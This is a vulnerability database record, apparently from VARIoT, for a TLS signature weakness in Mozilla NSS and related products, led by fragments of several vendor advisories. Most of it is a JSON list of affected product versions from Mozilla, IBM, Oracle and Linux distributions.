This update upgrades IBM Java SE 7 to versions 7 SR9-FP40 and 7R1 SR3-FP40. (CVE-2015-4734, CVE-2015-4803, CVE-2015-4805, CVE-2015-4806, CVE-2015-4810, CVE-2015-4835, CVE-2015-4840, CVE-2015-4842, CVE-2015-4843, CVE-2015-4844, CVE-2015-4860, CVE-2015-4871, CVE-2015-4872, CVE-2015-4882, CVE-2015-4883, CVE-2015-4893, CVE-2015-4902, CVE-2015-4903, CVE-2015-5006, CVE-2015-5041, CVE-2015-7575, CVE-2015-7981, CVE-2015-8126, CVE-2015-8472, CVE-2015-8540, CVE-2016-0264, CVE-2016-0363, CVE-2016-0376, CVE-2016-0402, CVE-2016-0448, CVE-2016-0466, CVE-2016-0483, CVE-2016-0494, CVE-2016-0686, CVE-2016-0687, CVE-2016-3422, CVE-2016-3426, CVE-2016-3427, CVE-2016-3443, CVE-2016-3449)
Red Hat would like to thank Andrea Palazzo of Truel IT for reporting the CVE-2015-4806 issue. (CVE-2015-7575)
Yves Younan discovered that graphite2 incorrectly handled certain malformed fonts. (CVE-2016-1523)
Bob Clary, Christian Holler, Nils Ohlmeier, Gary Kwong, Jesse Ruderman, Carsten Book, and Randell Jesup discovered multiple memory safety issues in Thunderbird. (CVE-2016-1930)
Aki Helin discovered a buffer overflow when rendering WebGL content in some circumstances
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0016", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "firefox esr", "scope": "eq", "trust": 1.3, "vendor": "mozilla", "version": "38.1.1" }, { "model": "firefox esr", "scope": "eq", "trust": 1.3, "vendor": "mozilla", "version": "38.2.1" }, { "model": "firefox esr", "scope": "eq", "trust": 1.3, "vendor": "mozilla", "version": "38.5.1" }, { "model": "firefox esr", "scope": "eq", "trust": 1.0, "vendor": "mozilla", "version": "38.4.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "15.04" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "15.10" }, { "model": "firefox esr", "scope": "eq", "trust": 1.0, "vendor": "mozilla", "version": "38.0" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.1" }, { "model": "network security services", "scope": "lte", "trust": 1.0, "vendor": "mozilla", "version": "3.20.1" }, { "model": "leap", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "42.1" }, { "model": "firefox esr", "scope": "eq", "trust": 1.0, "vendor": "mozilla", "version": "38.0.1" }, { "model": "firefox esr", "scope": "eq", "trust": 1.0, "vendor": "mozilla", "version": "38.0.5" }, { "model": "firefox esr", "scope": "eq", "trust": 1.0, "vendor": "mozilla", "version": "38.1.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "firefox esr", "scope": "eq", "trust": 1.0, "vendor": "mozilla", "version": "38.3.0" }, { "model": "firefox esr", "scope": "eq", "trust": 1.0, "vendor": "mozilla", "version": "38.5.0" }, { "model": "firefox", "scope": "lte", "trust": 1.0, "vendor": "mozilla", "version": "43.0.1" }, { "model": "firefox esr", "scope": "eq", "trust": 1.0, "vendor": "mozilla", "version": "38.2.0" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.2" }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.865" }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.866" }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.865" }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.791" }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.6105" }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.791" }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.6105" }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.866" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.1" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.11" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.5" }, { "model": "purepower integrated manager service appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "marketing operations", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2.1" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.8" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.22" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "websphere real time sr8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "infosphere optim query workload tuner for db2 for luw", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "11.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.11" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.306" }, { "model": "infosphere optim query workload tuner for db2 for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.1" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "cplex optimization studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.4" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.4.2" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.12" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.8" }, { "model": "cplex enterprise server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.6.3" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.12" }, { "model": "websphere real time", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.17" }, { "model": "sterling control center ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.21" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "oncommand shift", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37001.1" }, { "model": "websphere real time sr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "infosphere optim query workload tuner for db2 for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.11.3" }, { "model": "cplex enterprise server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.5.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.2" }, { "model": "tivoli asset discovery for distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.20" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.11" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "36.0.3" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.15" }, { "model": "sterling secure proxy ifix05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.8" }, { "model": "marketing platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.0" }, { "model": "license metric tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "domino fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.15" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.04" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50001.1" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "qradar siem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.2" }, { "model": "cplex optimization studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "35" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.5" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.5" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.3" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1200" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "37" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5" }, { "model": "infosphere biginsights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.00" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "tivoli storage manageroperations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.2.300" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "27.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.17" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.1" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3" }, { "model": "marketing platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.1" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "system networking rackswitch g8316", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.15.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "cplex enterprise server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.6.1" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.31" }, { "model": "watson explorer analytical components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.0.2" }, { "model": "elastic storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.20" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "websphere real time sr9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.4" }, { "model": "fabric manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "websphere dashboard framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.4" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.1104" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.12" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.116" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.1" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9.1" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.10" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "9.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.11" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.27" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.1" }, { "model": "spss modeler if010", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "17.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "watson content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "bluemix liberty for java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.7" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "tivoli network manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "rlks lkad borrow tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.8" }, { "model": "control center ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "38" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.1" }, { "model": "cognos business viewpoint fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "system networking rackswitch g8332", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.21.0" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.14" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "data studio client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.3" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "bluemix liberty for java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "multi-enterprise integration gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.3" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "rational synergy ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.3" }, { "model": "netezza diagnostics tools", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.2" }, { "model": "tivoli access manager for e-business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.11" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.8" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "operations analytics predictive insights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-1.3.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.4" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "sterling control center ifix02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.10" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.7" }, { "model": "tivoli directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.6" }, { "model": "system networking rackswitch g8124", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.15.0" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15.0.0.0" }, { "model": "bluemix liberty for java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v50007.4.0.7" }, { "model": "spss modeler fp1 if006", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "17" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.16" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.2" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.5" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "oncommand api services", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.7.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "40.0.3" }, { "model": "integrated management module ii for bladecenter 1aoo70h-5.40", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.110" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.3" }, { "model": "rational publishing engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0" }, { "model": "decision optimization center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.7.0.2" }, { "model": "tivoli network manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9" }, { "model": "virtual fabric 10gb switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.8.23.0" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "g8264cs si fabric image", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "websphere message broker toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.17" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.11" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": 